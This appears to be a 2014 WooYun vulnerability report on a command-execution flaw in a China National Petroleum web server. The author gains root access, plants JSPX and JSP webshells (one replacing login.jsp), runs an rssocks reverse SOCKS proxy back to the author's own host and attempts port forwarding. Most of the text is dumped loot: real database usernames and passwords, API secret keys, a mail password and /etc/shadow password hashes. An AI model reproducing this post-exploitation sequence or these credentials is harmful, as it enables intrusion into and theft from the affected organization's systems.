当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085735

漏洞标题:中国石油天然气集团公司可被内网渗透

相关厂商:中国石油天然气集团公司

漏洞作者: netwind

提交时间:2014-12-03 15:53

修复时间:2015-01-17 15:54

公开时间:2015-01-17 15:54

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-03: 细节已通知厂商并且等待厂商处理中
2014-12-08: 厂商已经确认,细节仅向厂商公开
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-17: 细节向公众公开

简要描述:

无意点开了中石油一个站有命令执行漏洞
发现是内网 于是就有了一个渗透测试的过程

详细说明:

浏览到一个中石油的站西北化工销售公司
http://xbhg.cnpc.com.cn/
发现页面下面有个 登陆窗口
鼠标放到登陆按钮上,显示出一个链接
http://xbhg.cnpc.com.cn/ExtranetWeb/loginDo.do
然后测试了一下发现有命令执行漏洞还是ROOT权限

1x.jpg


看了下IP属于内网

2x.jpg


看了下网络链接情况

3x.jpg


22端口开放
再看下登陆情况,可以查看管理从哪里登陆这个服务器

4x.jpg


对该服务器大致情况有了一个了解
为了方便操作 上传一个JSP shelL
但是出现了一个问题 访问SHELL 马上就跳转到LOGIN.JSP 非常苦恼。
不过发现只要不是JSP后缀就不会跳
这时请出园长的JSPX马,成功连接上菜刀

6x.jpg


然后对该服务器进行了一些信息收集
得到大量内网服务器数据库账号密码等信息
还有部分邮件账号信息

/usr/xbhg/webapp/ExtranetWeb/WEB-INF/classes/jdbc.properties
#jdbc.driverClass=com.mysql.jdbc.Driver
jdbc.jdbcUrl=jdbc:oracle:thin:@10.88.182.5:1521:orcl
jdbc.user=xbhg_wwqy
jdbc.password=member
ldap.username=xbhg_xiangwei
ldap.passwd=xiangweiway
#0 on 1 off
isopenldap=0
#0 on 1 off
isopennews=0
/usr/xbhg/webapp/network20141119/WEB-INF/classes/jdbc.properties
jdbc.jdbcUrl=jdbc:oracle:thin:@//10.21.24.30:1526/wwwdb
jdbc.user=xbhg_wwqy
jdbc.password=member
/usr/cmsapp.20140428/webapps/cnpcstockinfo/WEB-INF/classes/com/ucap/android/message/andriod.properties
#Created by JInto - www.guh-software.de
#Fri Jan 17 13:32:24 CST 2014
apiKey=xSN2v5FO8hfrnubVRfIvQpuL
apiKeyOther=
secretKey=lYsk9kmUk7dAg8EghAf9hbu15QDgbBkh
secretKeyOther=
/usr/cmsapp.20140428/webapps/app-comment/WEB-INF/classes/yz_sv_db.properties
jdbc.sqlserver.driver=oracle.jdbc.driver.OracleDriver
jdbc.sqlserver.url=jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.18)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.19)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.20)(PORT = 1526))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = wwwdb)))
jdbc.sqlserver.username=frontapp
jdbc.sqlserver.password=frontapp
String sourcePath = "http://10.21.24.116:8182/wla/customers/cnpc/topSites.json.jsp?d="+day_first_prevM+"&ed="+day_end_prevM;
/usr/cmsapp/webserver/tomcat7/conf/tomcat-users.xml
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
-->
 <Logger className="org.apache.catalina.logger.FileLogger" prefix="cnpcstockinfo_log." suffix=".txt" timestamp="true"/>
  
  <Resource name="cnpcstockinfods" auth="Container"
	    type="javax.sql.DataSource" driverClassName="com.microsoft.sqlserver.jdbc.SQLServerDriver"
	    url="jdbc:sqlserver://10.21.24.36\\EIPAPPINST01:1434"
	    username="oilprice" password="oilprice" maxActive="50" maxIdle="10"
	    maxWait="10000"/>
	
   <Resource name="cnpcstockinfodscms" auth="Container"
	    type="javax.sql.DataSource" driverClassName="oracle.jdbc.driver.OracleDriver"
	    url="jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.18)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.19)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.20)(PORT = 1526))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = wwwdb)))"
	    username="frontapp" password="frontapp" maxActive="50" maxIdle="10"
	    maxWait="10000"/>
	    
</Context>
/usr/cmsapp/webapps/app-wsdc/WEB-INF/classes/applicationContext.newpasswd.xml
	<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource">
		<property name="url" value="jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.18)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.19)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.20)(PORT = 1526))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = wwwdb)))"/>
		<property name="username" value="cmspro"/>
		<property name="password" value="cqmyg*128"/>
		<property name="driverClassName" value="oracle.jdbc.driver.OracleDriver"/>
	</bean>
/usr/cmsapp/webapps/app-wsdc/WEB-INF/classes/applicationContext.xml.bak
<!-- 使用apache 的dbcp连接池
	<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource">
		<property name="url" value="jdbc:oracle:thin:@localhost:1521:orcl"/>
		<property name="username" value="website"/>
		<property name="password" value="website"/>
		<property name="driverClassName" value="oracle.jdbc.driver.OracleDriver"/>
	</bean> -->
/usr/cmsapp/webapps/app-wsdc/WEB-INF/classes/yz_sv_db.newpasswd.properties
jdbc.sqlserver.driver=oracle.jdbc.driver.OracleDriver
jdbc.sqlserver.url=jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.18)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.19)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.20)(PORT = 1526))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = wwwdb)))
jdbc.sqlserver.username=cmspro
jdbc.sqlserver.password=cqmyg*128
/usr/cmsapp/webapps/app-wsdc/WEB-INF/classes/yz_sv_db.cmspro.properties
jdbc.sqlserver.driver=oracle.jdbc.driver.OracleDriver
jdbc.sqlserver.url=jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.18)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.19)(PORT = 1526))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.21.24.20)(PORT = 1526))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = wwwdb)))
jdbc.sqlserver.username=cmspro
jdbc.sqlserver.password=cmspro
jdbc.sqlserver.driver=oracle.jdbc.driver.OracleDriver
jdbc.sqlserver.url=jdbc:oracle:thin:@10.8.9.131:1521:XE
jdbc.sqlserver.username=cmspro
jdbc.sqlserver.password=cmspro
#Created by JInto - www.guh-software.de
#Fri Jan 17 13:32:24 CST 2014
apiKey=PBRo81SOdP1UKxsenivyExF9
apiKeyNeiBu=ioGAqnvk2yRLPYihOCauMRix
secretKey=IwdvRzMCN2AYnPWXlL4jNiq4D77jcfgU
secretKeyNeiBu=aLAZHv1c7LjaugcllOZ7IwtXMCNR2FLO
本服务器账号密码
root:$6$uCxdxOLi$789hWWk/IyuEKp/pIKbZB2A81VmWzH5koW7o.tjeRc415cx5QIMSPF9.cOuHiNGVsNcfoS36SpmuszY8cHNs7.:16249:0:99999:7:::
bin:!*:15615:0:99999:7:::
daemon:!*:15615:0:99999:7:::
adm:!*:15615:0:99999:7:::
lp:!*:15615:0:99999:7:::
sync:!*:15615:0:99999:7:::
shutdown:!*:15615:0:99999:7:::
halt:!*:15615:0:99999:7:::
mail:!*:15615:0:99999:7:::
uucp:!*:15615:0:99999:7:::
operator:!*:15615:0:99999:7:::
games:!*:15615:0:99999:7:::
gopher:!*:15615:0:99999:7:::
ftp:!*:15615:0:99999:7:::
nobody:!*:15615:0:99999:7:::
dbus:!!:16143::::::
usbmuxd:!!:16143::::::
rpc:!!:16143:0:99999:7:::
vcsa:!!:16143::::::
rtkit:!!:16143::::::
abrt:!!:16143::::::
avahi-autoipd:!!:16143::::::
saslauth:!!:16143::::::
postfix:!!:16143::::::
rpcuser:!!:16143::::::
nfsnobody:!!:16143::::::
haldaemon:!!:16143::::::
gdm:!!:16143::::::
ntp:!!:16143::::::
apache:!!:16143::::::
pulse:!!:16143::::::
sshd:!!:16143::::::
tcpdump:!!:16143::::::
oprofile:!!:16143::::::
eipsysadmin:$6$Zj4W4kFL97MVx321$DvgP0kcAC1RSlwVQAOTiWZjMqSs3Tl4oYOSlN0HJHN/bJksvEFCtqL22pkaGMUbC5gmPtFZQVnVFTnaFhvQQp.:16143:0:99999:7:::
sysmonitor:$6$OF0Vctia$tYPHmACHqqaquLPPSDNLoOzfu9KJISQe6YzW0nYHtGeSh8mID.NGPxfits7vqXmgQNaunZEM2C.ErM/CEIGQk.:16188:1:99999:14:::
Protocol 2
UsePAM yes
SyslogFacility AUTHPRIV
PasswordAuthentication yes
ClientAliveInterval 600
ClientAliveCountMax 0
IgnoreRhosts yes
HostBasedAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
X11Forwarding no
AcceptEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES 
AcceptEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT 
AcceptEnv LC_IDENTIFICATION LC_ALL
AcceptEnv XMODIFIERS
ChallengeResponseAuthentication no
GSSAPIAuthentication yes
GSSAPICleanupCredentials yes
Banner /etc/issue.net
Subsystem       sftp    /usr/libexec/openssh/sftp-server
/home/eipsysadmin/Tdb.java	
import java.sql.Connection;
import java.sql.DriverManager;
public class Tdb {
	/**
	 * @param args
	 */
	public static void main(String[] args)throws Exception {
		// TODO Auto-generated method stub
		Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
		//String url="jdbc:sqlserver://10.21.24.37:1433;databaseName=xbhgsell";
		String url="jdbc:sqlserver://10.21.24.37\\EIPAPPINST02;databaseName=xbhgsell";
		String usr = "zhangzq";
		String pswd = "zhangzq";
		Connection conn = DriverManager.getConnection(url, usr,pswd);
		conn.close();
	}
}
network --onboot no --device eth0 --bootproto static --ip 20.21.24.118 --netmask 255.255.255.192 --gateway 10.21.24.126 --noipv6 --nameserver 10.21.12.25 --hostname wwwSocial01
rootpw  --iscrypted $6$V3rZmIYXLjJ/sfH9$rMzcqPFd/E.hTHlwtGstZcVGuYveliv7cU0bvycPj0WgKQpKATOoaPBlGwtxQEKIU8v4sJQkD5./ynbT0WBM.0】
/usr/cmsapp/webapps/publicly/dblink/dbconn.jsp
<%!
	/**
	* <p>
	* 连接的数据库是gmspro:<br/>
	* 用户是gmspro<br/>
	* </p>
	* <p>在 [所有]项目下可以使用此方法获取到数据库连接</p>
	*/
	public Connection getGmsproDBConnection() throws Exception{
		String url = "jdbc:oracle:thin:@117.78.1.182:1521:orcl";
		String user = "gsmpro";
		String pwd = "gsmpro"; 
		return DriverManager.getConnection(url,user,pwd);
	}
%>
 * 获取数据库连接
	 */ 
	/* public Connection getStockinfoConnection() throws Exception {
	Context ctx = new InitialContext();
	DataSource ds = (DataSource) ctx.lookup("java:comp/env/cnpcstockinfods");
	return ds.getConnection();
	} */
	public Connection getStockinfoConnection() throws Exception {
		Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
		return DriverManager.getConnection("jdbc:sqlserver://10.21.24.36\\EIPAPPINST01","oilprice","oilprice");
	}
	/**
/usr/cmsapp/webapps/publicly/jndi/rzjc-mssql.xml
?<?xml version="1.0" encoding="UTF-8"?>
<Context docBase="D:\workspace\rzjc\rzjc" path="/rzjc" reloadable="true" crossContext="true">
		<Resource name="QtyyOracleDS" auth="Container" type="javax.sql.DataSource" maxActive="30" maxIdle="3" maxWait="10000" username="sa" password="jwztsa" driverClassName="com.microsoft.sqlserver.jdbc.SQLServerDriver"               url="jdbc:sqlserver://192.168.1.135:1433;DatabaseName=test;SelectMethod=cursor"/> 
</Context>
?<?xml version="1.0" encoding="UTF-8"?>
<Context docBase="D:\workspace\rzjc\rzjc" path="/rzjc" reloadable="true" crossContext="true">
		<Resource name="QtyyOracleDS" auth="Container" type="javax.sql.DataSource" maxActive="30" maxIdle="3" maxWait="10000" username="root" password="root" driverClassName="com.mysql.jdbc.Driver"               url="jdbc:mysql://localhost/test"/> 
</Context>
?<?xml version="1.0" encoding="UTF-8"?>
<Context docBase="D:\workspace\rzjc\rzjc" path="/rzjc" reloadable="true" crossContext="true">
		<Resource name="QtyyOracleDS" auth="Container" type="javax.sql.DataSource" maxActive="30" maxIdle="3" maxWait="10000" username="cmspro" password="cmspro" driverClassName="oracle.jdbc.driver.OracleDriver"               url="jdbc:oracle:thin:@124.238.215.172:1521:orcl"/> 
</Context>
?<?xml version="1.0" encoding="UTF-8"?>
<Context docBase="D:\workspace\rzjc\rzjc" path="/rzjc" reloadable="true"
	crossContext="true">
	<Resource name="QtyyOracleDS" auth="Container"
		type="javax.sql.DataSource" maxActive="30" maxIdle="3" maxWait="10000"
		username="test" password="test"
		driverClassName="com.ibm.db2.jcc.DB2Driver"
		url="jdbc:db2://192.168.1.222:50000/cms_test" />
</Context>
/usr/cmsapp/webapps/publicly/publicmessage/sendMail.jsp
 // out.println(":::::::"+email+"::transport:"+transport);
         //transport.connect(server163,"huangyyxing","hyh15801686114");  
         transport.connect(server163,"public@aqsiq.gov.cn","it0wnet23718226");  
		
jdbc.sqlserver.driver=oracle.jdbc.driver.OracleDriver
jdbc.sqlserver.url=jdbc:oracle:thin:@10.8.9.132:1521:XE
jdbc.sqlserver.username=cmspro
jdbc.sqlserver.password=cmspro


下一步计划从内网反弹一个SOCKS5代理出来
这个时候出现了问题,用菜刀上传ssocks 总是失败
菜刀命令行下WGET下载也失败
于是想了一下 既然访问JSP总是跳到LOGIN.JSP 那么就暂时把LOGIN.JSP替换成JSP大马吧 果然可行
我们把login.jsp替换 上传大马 上传文件
解压
[/]$ tar -zxvf ssocks.tar.gz
编译./configure&make
进入SRC目录 执行命令./rssocks --socks *.*.*.*:1234
本机用htran监听 htran -listen 1234 1988
可惜总是失败
看了下服务器的连接状况 发现一直处于等待连接的状态
然后经过N久尝试 认为可能是这个服务器不能访问外网
于是服务器执行ping -c 2 www.baidu.com
不能接受返回包,应该是不能访问外网
这时候准备继续尝试下简历HTTP通道
把服务器某端口转发到本机

5x.jpg


看起来貌似成功了,不过可惜,没多久就断开了。
略感伤心
接着下一步就是上传NMAP直接在服务器进行端口扫描 弱口令扫描等
不再继续了。。。。有点疲倦!

漏洞证明:

1x.jpg


6x.jpg


#jdbc.driverClass=com.mysql.jdbc.Driver
jdbc.jdbcUrl=jdbc:oracle:thin:@10.88.182.5:1521:orcl
jdbc.user=xbhg_wwqy
jdbc.password=member
ldap.username=xbhg_xiangwei
ldap.passwd=xiangweiway
本服务器账号密码
root:$6$uCxdxOLi$789hWWk/IyuEKp/pIKbZB2A81VmWzH5koW7o.tjeRc415cx5QIMSPF9.cOuHiNGVsNcfoS36SpmuszY8cHNs7.:16249:0:99999:7:::
bin:!*:15615:0:99999:7:::
daemon:!*:15615:0:99999:7:::
adm:!*:15615:0:99999:7:::
lp:!*:15615:0:99999:7:::
sync:!*:15615:0:99999:7:::
shutdown:!*:15615:0:99999:7:::
halt:!*:15615:0:99999:7:::
mail:!*:15615:0:99999:7:::
uucp:!*:15615:0:99999:7:::
operator:!*:15615:0:99999:7:::
games:!*:15615:0:99999:7:::
gopher:!*:15615:0:99999:7:::
ftp:!*:15615:0:99999:7:::
nobody:!*:15615:0:99999:7:::
dbus:!!:16143::::::
usbmuxd:!!:16143::::::
rpc:!!:16143:0:99999:7:::
vcsa:!!:16143::::::
rtkit:!!:16143::::::
abrt:!!:16143::::::
avahi-autoipd:!!:16143::::::
saslauth:!!:16143::::::
postfix:!!:16143::::::
rpcuser:!!:16143::::::
nfsnobody:!!:16143::::::
haldaemon:!!:16143::::::
gdm:!!:16143::::::
ntp:!!:16143::::::
apache:!!:16143::::::
pulse:!!:16143::::::
sshd:!!:16143::::::
tcpdump:!!:16143::::::
oprofile:!!:16143::::::
eipsysadmin:$6$Zj4W4kFL97MVx321$DvgP0kcAC1RSlwVQAOTiWZjMqSs3Tl4oYOSlN0HJHN/bJksvEFCtqL22pkaGMUbC5gmPtFZQVnVFTnaFhvQQp.:16143:0:99999:7:::
sysmonitor:$6$OF0Vctia$tYPHmACHqqaquLPPSDNLoOzfu9KJISQe6YzW0nYHtGeSh8mID.NGPxfits7vqXmgQNaunZEM2C.ErM/CEIGQk.:16188:1:99999:14:::

修复方案:

建议全网检查漏洞

版权声明:转载请注明来源 netwind@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-08 09:06

厂商回复:

配置不当

最新状态:

2014-12-24:已整改完毕,谢谢。

漏洞评价:

评论